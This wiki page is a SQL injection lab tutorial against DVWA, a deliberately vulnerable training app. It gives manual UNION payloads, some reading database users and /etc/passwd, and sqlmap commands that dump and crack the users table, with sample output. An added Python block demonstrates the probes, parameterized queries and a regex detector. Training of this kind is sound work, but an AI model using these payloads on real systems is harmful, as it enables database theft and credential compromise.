Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"

From OnnoWiki
Revision as of 05:54, 14 November 2014

Source: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Background

Before using SQLMAP it is best to first check whether an injection is possible at all. SQLMAP is only a helper tool; we should know the manual process behind it. Every SQLMAP feature can be done by hand.


Manual Process To Test Vulnerability

Check whether our site is vulnerable:

1' or '2'='2

We need to see how many columns are returned before we get an error.

' and 1=1 union select 1,2 #
' and 1=1 union select 1,2,3 #

This will show that the table only has 2 columns.

Let's do the injection.

' union SELECT 1, user() -- '
' and 1=1 union select database(),version() #
' union SELECT 1, user() #
' and 1=1 union select null,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #
' and 1=1 union select first_name,password from dvwa.users #
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #
' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #
' union select user, password FROM users #
' union SELECT 1, load_file('/etc/hosts') #
' union SELECT 1, load_file('/etc/passwd') #

We know that 1,2,3 gives us an error, so the record set has only 2 columns.
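As an added illustration (not code from the original page or from DVWA), the column-counting step and the 1' or '2'='2 probe above are run against a constructed in-memory SQLite stand-in for DVWA's users table, beside the parameterized query that stops them; the detector at the end assumes a raw URL query string such as a web access log would record. SQLite is used instead of MySQL, so the probes end in "-- " rather than "#".

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for DVWA's users table. SQLite in memory, not MySQL,
# so probes here end in "-- " rather than MySQL's "#"; the rows are made up.
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
               "last_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?)",
                   [(1, "admin", "admin", "hash-1"), (2, "Gordon", "Brown", "hash-2")])
    return db

def lookup_vulnerable(db, user_id):
    # Same pattern as DVWA's low-security page: the id is pasted into the SQL
    # text, so quotes inside it become part of the query.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # Hardened form: the id is bound as a value, so "1' or '2'='2" is compared
    # as one literal string against user_id and matches nothing.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def column_count_probe(db, max_cols=5):
    # The page's column-counting step: grow the UNION until the database stops
    # complaining about a column mismatch. Returns that column count, or None.
    for n in range(1, max_cols + 1):
        payload = "' union select " + ",".join(str(i) for i in range(1, n + 1)) + " -- "
        try:
            lookup_vulnerable(db, payload)
            return n
        except sqlite3.OperationalError:  # column count mismatch across the UNION
            continue
    return None

PROBE_RE = re.compile(r"union\s+select|'\s*or\s*'|information_schema|load_file\s*\(", re.I)

def is_suspicious(query_string):
    # Detection side: URL-decode a raw query string (as found in a web access log)
    # and flag the probe shapes used above.
    return PROBE_RE.search(unquote_plus(query_string)) is not None
```

With the constructed table, lookup_vulnerable leaks both rows for the probe while lookup_parameterized returns none, and column_count_probe reports 2, matching the page's manual result.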


Using SQLMAP

Parameters we will be using and what they mean

   -u This specifies the URL
   --cookie This will output (emulate) a cookie header
       For this we need a couple of things, which we can find with the Firefox add-on Tamper Data. We need to know the cookie header information; just by running Tamper Data we can see that some session information gets submitted, so we will emulate this header. Sample header we will emulate:
           Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
   --dbs This will list database names if successful
   -D This will specify the database
   --tables This will list the tables from the database specified in the -D parameter
   --columns This will list the columns of the table specified in the -T parameter
   --current-user This will return the current user running SQL
   --users This will return a list of all users in SQL
   --passwords This will return the hashes of the passwords for the SQL instance

Execution examples

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" --dbs

Returns:

   [15:17:52] [INFO] fetching database names
   available databases [4]:
   [*] dvwa
   [*] information_schema
   [*] mysql
   [*] performance_schema

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa --tables

Returns:

   [15:18:19] [INFO] fetching tables for database: 'dvwa'
   Database: dvwa
   [2 tables]
   +-----------+
   | guestbook |
   | users     |
   +-----------+

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa -T users --columns

Returns:

   [15:19:14] [INFO] fetching columns for table 'users' in database 'dvwa'
   Database: dvwa
   Table: users
   [6 columns]
   +------------+-------------+
   | Column     | Type        |
   +------------+-------------+
   | user       | varchar(15) |
   | avatar     | varchar(70) |
   | first_name | varchar(15) |
   | last_name  | varchar(15) |
   | password   | varchar(32) |
   | user_id    | int(6)      |
   +------------+-------------+

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa -T users --dump

--dump will dump the data. If there are hashed passwords, then depending on the version of SQLMAP you have, it will prompt to crack them. You can specify your own dictionary or use the one that ships with SQLMAP. Here the base dictionary cracks all the user passwords.

See the output:

   [15:21:44] [INFO] starting dictionary-based cracking (md5_generic_passwd)
   [15:21:44] [INFO] starting 4 processes
   [15:21:47] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
   [15:21:50] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
   [15:21:53] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
   [15:21:55] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
   Database: dvwa
   Table: users
   [5 entries]
   +---------+---------+---------------------------------------------+-----------+------------+
   | user_id | user    | password                                    | last_name | first_name |
   +---------+---------+---------------------------------------------+-----------+------------+
   | 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
   | 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
   | 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
   | 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
   | 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
   +---------+---------+---------------------------------------------+-----------+------------+

There you have it: you have now gained access to all the SQL users.




References